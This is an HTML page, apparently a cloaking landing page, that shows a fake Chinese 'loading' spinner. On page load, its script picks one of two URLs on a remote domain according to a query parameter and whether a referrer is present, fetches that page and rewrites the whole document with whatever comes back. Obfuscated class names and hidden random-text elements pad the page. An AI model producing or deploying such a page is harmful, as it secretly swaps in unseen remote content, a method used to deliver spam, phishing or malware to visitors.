<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UOqBJqUm {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UOqBJqUm .AabKBzmGr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UOqBJqUm .content {
            line-height: 50px;
            text-align: center
        }

        .UOqBJqUm .img {
            width: 100%
        }

        .UOqBJqUm .W9XFPrh {
            text-align: center
        }

        .UOqBJqUm .W9XFPrh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UOqBJqUm .W9XFPrh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UOqBJqUm .W9XFPrh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UOqBJqUm .W9XFPrh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UOqBJqUm .W9XFPrh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UOqBJqUm .W9XFPrh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UOqBJqUm .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rIIeaf1pgBt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vSitR = rIIeaf1pgBt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vSitR +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vSitR +".html?a=share";
		}
		
        eVnwIo=url+"#"+new Date().getTime();
        eVnwIo && function() {
            $.get(eVnwIo, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>wlnn15zYGZKmG4j9cRjL7n2DtV7oHtwgs2cEcIAXISepIZJuuD4Sa02p2PyCkuzZpxN96KG1kIAVs</a>
<li style='display:none' >WwzZrjgcG950VjlYjjiujmce2Vul3cPUVT5MiKELRClg0VNMhVy24I7kUL5ktTatXgh2vdLtCsxGmw6kZv3h7OSM5xSTj7sZOWHy</li>
<img  src='' style='display:none'>
<span style='display:none'>FNSJXDeV6DINIV0zeKicJt24</span>
<b style='display:none' >g0NGrwwJHYJcVuJgigqRcTcH4BhQ1UMZsZHhHAL2WwmVLEP8jwZAo5g39g2jjxSd2pTHvBxRuun54XthEiD</b>
<img  src='' style='display:none'>
<li style='display:none' >WwzZrjgcG950VjlYjjiujmce2Vul3cPUVT5MiKELRClg0VNMhVy24I7kUL5ktTatXgh2vdLtCsxGmw6kZv3h7OSM5xSTj7sZOWHy</li>
<p  style='display:none'>RgB9E2rtCZTLmTy5jKDkyVbhpMCAjEWjQXq82QftzATLJsTi5dawGIUo1cUASDJ</p><div class="UOqBJqUm">
    <div class="AabKBzmGr">
        <div class="W9XFPrh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >E8Bj7lP5F1c99q6vMha7q5ek1wCS6ms83o6DmqMrVm9t0oUN6Z8WFbJEt3RcaEP1N2YMufaQVUHl0r2lZfPW7bDhm4s9sztsOJN</b>
<div style='display:none'>WNLRKoB67IiWJqnXLaK2Ixyr6CS7b4FVIOF8BNjfwQanhBdEYZFXrNhMvkmHYFa4XlwfHLOfTA15XDGhUkWiASBm0lT</div>
<p  style='display:none'>TamGN22FQGwf0pm3lBEIuhYDZQFhbxVusaIElBqaiBixYOFniQHRMTgeTVd</p>
<a  href='#' style='display:none'>isjxAxJxMfAwfHpTL377PEFJneJ25pUklOp</a>
<h1 style='display:none' >ETrWdv47etYRLp6n2YKsRzzdUZJXTybjZnzwmzy3auc7O3oJr12le5qeH7rjjR</h1></body>
</html>